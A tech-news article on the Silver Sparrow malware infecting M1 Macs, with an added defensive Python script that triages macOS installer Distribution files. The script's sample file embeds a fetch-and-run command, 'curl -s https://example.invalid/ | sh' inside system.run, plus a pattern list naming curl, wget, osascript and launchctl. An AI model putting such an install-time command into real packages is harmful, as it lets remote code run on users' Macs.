Apple Deploys Countermeasures Against Pesky Silver Sparrow Malware But Is Your Mac Affected?

If there is one thing I learned from cartoons in the 1980s, it is that knowing is half the battle. Thank you G.I. Joe for that tidbit. Fast forward several decades and that lesson is playing out right before our very eyes, in relation to another malware strain that is able to run natively on Apple's fancy new custom M1 processor. Apple knows about it and has taken steps to stop it from spreading (more on that in a bit).

Apple is embarking on a two-year transition phase, in which it is moving completely away from using Intel's CPUs in its Mac systems, in favor of in-house designs based on Arm. The first of those is the M1 chip. We have already spent some hands-on time with the M1 as part of our Mac mini 2020 review, which we found to be a "potent little machine."

The M1 is a spunky chip for sure, and apparently it is attracting the attention of bad actors. Last week we wrote about the first bit of malware in the wild that is native to the M1 chip, and now researchers have found a separate malware strain that has infected around 30,000 Mac systems with an M1 SoC inside, across 153 countries.

Called "Silver Sparrow," security researchers at Red Canary describe it as an activity cluster that includes a binary compiled to run on M1 chips. Oddly enough, Silver Sparrow is missing a payload, though that is not necessarily reason to rest easy.

"Though we haven’t observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat, uniquely positioned to deliver a potentially impactful payload at a moment’s notice," the researchers explain.

Silver Sparrow uses the macOS Installer JavaScript API to infect systems with an M1 processor. Once a Mac is infected, it checks in with a control server every hour to see if there are any commands to execute or further files to download.
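The Installer JavaScript API mentioned above lets a package's Distribution file run commands at install time. As an added defensive example (not code from the article, Red Canary or Apple), the Python helper below parses a constructed Distribution file, flags script blocks that call `system.run`, and reports whether the package declares arm64 support; the sample XML and the `triage_distribution` name are my own assumptions.

```python
"""Triage helper for macOS installer packages that embed JavaScript.

A flat .pkg can be expanded with `pkgutil --expand pkg.pkg outdir`; the
Distribution file inside is XML whose <script> elements hold JavaScript that
Installer.app evaluates. A system.run(...) call there executes a command
before any package payload is written, which is the mechanism the article
describes. This is an added example, not the malware's or Apple's code.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample Distribution file (not a real Silver Sparrow artifact).
SAMPLE_DISTRIBUTION = """<installer-gui-script minSpecVersion="2">
    <title>Example Update</title>
    <options hostArchitectures="x86_64,arm64"/>
    <script><![CDATA[
    function installationCheck() {
        // Runs at install time, before the user sees any payload.
        system.run("/bin/sh", "-c", "curl -s https://example.invalid/ | sh");
        return true;
    }
    ]]></script>
    <choices-outline><line choice="default"/></choices-outline>
    <choice id="default"><pkg-ref id="com.example.pkg"/></choice>
</installer-gui-script>"""

# Installer JavaScript API calls that execute a command on the host.
EXEC_CALLS = re.compile(r"\bsystem\.(run|runOnce)\s*\(")
# Shell tools inside an installer script that warrant a second look.
SHELL_HINTS = re.compile(r"\b(curl|wget|osascript|launchctl)\b")


def triage_distribution(xml_text):
    """Return findings for one Distribution file as a dict."""
    root = ET.fromstring(xml_text)
    findings = {"arm64": False, "calls": [], "hints": []}
    opts = root.find("options")
    if opts is not None and "arm64" in opts.get("hostArchitectures", ""):
        findings["arm64"] = True  # declares native Apple silicon support
    for script in root.iter("script"):
        body = script.text or ""  # CDATA content is exposed as plain text
        findings["calls"] += [m.group(1) for m in EXEC_CALLS.finditer(body)]
        findings["hints"] += sorted(set(SHELL_HINTS.findall(body)))
    findings["suspicious"] = bool(findings["calls"])
    return findings


if __name__ == "__main__":
    print(triage_distribution(SAMPLE_DISTRIBUTION))
```

A script block alone is not proof of malice, since legitimate installers use the same API for version checks; the output is a triage signal to pair with the package's signing identity.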

Fortunately, this new threat was found relatively early, before it could do any actual damage. And because knowing is half the battle, Apple has been able to neutralize the threat. A spokesperson told AppleInsider that Apple has revoked certificates for developer accounts tied to the malware's creator, which essentially prevents Silver Sparrow from spreading.

Apple also points out that it leverages various hardware and software security protections, in addition to doling out regular updates. In other words, Apple is not really concerned about this one.